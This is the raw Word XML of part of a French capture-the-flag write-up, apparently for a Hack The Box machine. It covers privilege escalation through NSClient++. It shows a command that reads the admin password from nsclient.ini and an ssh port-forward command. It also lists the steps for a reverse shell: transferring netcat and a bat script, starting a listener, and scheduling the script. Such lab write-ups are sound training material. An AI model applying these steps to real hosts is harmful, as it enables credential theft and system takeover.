            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23BE9038" w14:textId="77777777" w:rsidR="00E9187C" w:rsidRDefault="00E9187C"/>
    <w:p w14:paraId="37E07A12" w14:textId="1FF22316" w:rsidR="00E9187C" w:rsidRDefault="00F92FE6" w:rsidP="00F92FE6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="44AB80BD">
          <v:shape id="_x0000_i1032" type="#_x0000_t75" style="width:453.3pt;height:322.45pt">
            <v:imagedata r:id="rId13" o:title="programfile"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1402FBE7" w14:textId="69416AD2" w:rsidR="00E21366" w:rsidRDefault="009839B0">
      <w:r>
        <w:t xml:space="preserve">Le logiciel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F41AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NSClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F41AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> n’est pas installé par défaut par Windows, il est donc très suspect. Un tour sur </w:t>
      </w:r>
      <w:r w:rsidRPr="004F41AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exploit-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F41AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permet de trouver un exploit :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DABE806" w14:textId="0C4AA363" w:rsidR="009839B0" w:rsidRDefault="00AB5133">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="009839B0" w:rsidRPr="00522F4A">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/46802</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E0462E6" w14:textId="3EB14400" w:rsidR="009839B0" w:rsidRDefault="009839B0">
      <w:r>
        <w:t>Toutes les étapes sont détaillées dan</w:t>
      </w:r>
      <w:r w:rsidR="004F41AA">
        <w:t>s l’exploit et comment les effectuer</w:t>
      </w:r>
      <w:r>
        <w:t>, en résumé :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44810D85" w14:textId="6380C533" w:rsidR="009839B0" w:rsidRDefault="009839B0" w:rsidP="009839B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Obtenir le mot de passe de l’administrateur de l’interface web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A12614F" w14:textId="6783B4D5" w:rsidR="009C43C4" w:rsidRPr="004F41AA" w:rsidRDefault="009C43C4" w:rsidP="009C43C4">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F41AA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">C:\&gt; type </w:t>
      </w:r>
      <w:r w:rsidRPr="004F41AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>"C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F41AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>NSClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F41AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>++\nsclient.ini"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1A2CD0" w14:textId="5F8BE520" w:rsidR="009839B0" w:rsidRDefault="009839B0" w:rsidP="009839B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Activer des modules permettant l’appel de script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E1E8E6" w14:textId="63E13DF6" w:rsidR="009839B0" w:rsidRDefault="00AB5133" w:rsidP="009839B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Transférer</w:t>
      </w:r>
      <w:r w:rsidR="009839B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009839B0">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009839B0">
        <w:t xml:space="preserve"> et un script bat à la victime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E54FDD" w14:textId="7C4E31BB" w:rsidR="009839B0" w:rsidRDefault="009839B0" w:rsidP="009839B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mettre un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en écoute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED6BE28" w14:textId="2E1C4FB3" w:rsidR="009839B0" w:rsidRDefault="009839B0" w:rsidP="009839B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ajouter le script bat sur l’interface web victime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2A4113" w14:textId="1CF041F4" w:rsidR="009839B0" w:rsidRDefault="009839B0" w:rsidP="009839B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Planifier une tache pour déclencher le script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4A0BD7" w14:textId="4E455B51" w:rsidR="009839B0" w:rsidRDefault="009839B0" w:rsidP="009839B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attendre pour avoir la session et récupérer le flag root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A4598" w14:textId="27264932" w:rsidR="007E13A8" w:rsidRDefault="007E13A8" w:rsidP="007E13A8">
      <w:r>
        <w:t>Pour se connecter sur l’interface web, comme le service tourne en local, il faut faire une redirection de port en ssh sur la machine attaquant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7E13A8" w14:paraId="754D8E7A" w14:textId="77777777" w:rsidTr="00AB5133">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="13F6920C" w14:textId="1299E89E" w:rsidR="007E13A8" w:rsidRDefault="007E13A8" w:rsidP="007E13A8">
            <w:r>
              <w:t>$ ssh –L 8443 :127.0.0.1 :8443 nadine@10.10.10.184</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="357D9F82" w14:textId="21ED5EA2" w:rsidR="007E13A8" w:rsidRDefault="007E13A8" w:rsidP="007E13A8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(Tout le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>traffic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> entrant en 8443 est redirigé sur 127.0.0.1 sur le port local 8443)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DACEFB" w14:textId="736ADE7A" w:rsidR="006B0C3C" w:rsidRDefault="006B0C3C" w:rsidP="006B0C3C">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="006B0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4F69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8ABAAAE2"/>
    <w:lvl w:ilvl="0" w:tplc="B3426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CA"/>
    <w:rsid w:val="00013D60"/>
    <w:rsid w:val="00046CBF"/>
    <w:rsid w:val="0010751B"/>
    <w:rsid w:val="001569EA"/>
    <w:rsid w:val="001F53CA"/>
    <w:rsid w:val="0021052D"/>
    <w:rsid w:val="00227395"/>
    <w:rsid w:val="003403A9"/>
    <w:rsid w:val="00344C61"/>
    <w:rsid w:val="003608AC"/>
    <w:rsid w:val="003609CF"/>
    <w:rsid w:val="00367F13"/>
    <w:rsid w:val="00377577"/>
    <w:rsid w:val="004149C6"/>
    <w:rsid w:val="004469AB"/>
    <w:rsid w:val="00491C1E"/>
    <w:rsid w:val="004E0625"/>
    <w:rsid w:val="004F41AA"/>
    <w:rsid w:val="005075DD"/>
    <w:rsid w:val="005151D9"/>
    <w:rsid w:val="00533C4C"/>
    <w:rsid w:val="00556C6D"/>
    <w:rsid w:val="005A7E52"/>
    <w:rsid w:val="005C5E21"/>
    <w:rsid w:val="00600CFA"/>
    <w:rsid w:val="00617AF5"/>
    <w:rsid w:val="00630447"/>
    <w:rsid w:val="006333E7"/>
    <w:rsid w:val="006B0C3C"/>
    <w:rsid w:val="007109F2"/>
    <w:rsid w:val="00762B6D"/>
    <w:rsid w:val="007E13A8"/>
    <w:rsid w:val="00882955"/>
    <w:rsid w:val="00895BC7"/>
    <w:rsid w:val="008A6B77"/>
    <w:rsid w:val="008A7300"/>
    <w:rsid w:val="008E0A52"/>
    <w:rsid w:val="008E13B6"/>
    <w:rsid w:val="008F3341"/>
    <w:rsid w:val="00976C4F"/>
    <w:rsid w:val="009839B0"/>
    <w:rsid w:val="009C43C4"/>
    <w:rsid w:val="00AB5133"/>
    <w:rsid w:val="00AD2A5A"/>
    <w:rsid w:val="00B71C2C"/>
    <w:rsid w:val="00BC285F"/>
    <w:rsid w:val="00C0325B"/>
    <w:rsid w:val="00C95DE6"/>
    <w:rsid w:val="00CB68A9"/>
    <w:rsid w:val="00CC71ED"/>
    <w:rsid w:val="00CE7D95"/>
    <w:rsid w:val="00D01E8A"/>
    <w:rsid w:val="00D06377"/>
    <w:rsid w:val="00D358C2"/>
    <w:rsid w:val="00D515A2"/>
    <w:rsid w:val="00D5628D"/>
    <w:rsid w:val="00D97E8F"/>
    <w:rsid w:val="00E11D3E"/>
    <w:rsid w:val="00E21366"/>
    <w:rsid w:val="00E40B0E"/>
    <w:rsid w:val="00E9187C"/>
    <w:rsid w:val="00F239ED"/>
    <w:rsid w:val="00F45276"/>
    <w:rsid w:val="00F47424"/>
    <w:rsid w:val="00F92FE6"/>
    <w:rsid w:val="00FC5A0A"/>
    <w:rsid w:val="00F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B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D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3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839B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D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3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83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exploit-db.com/exploits/4680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Utilisateur Windows</cp:lastModifiedBy>
  <cp:revision>67</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-09T11:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-09T20:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>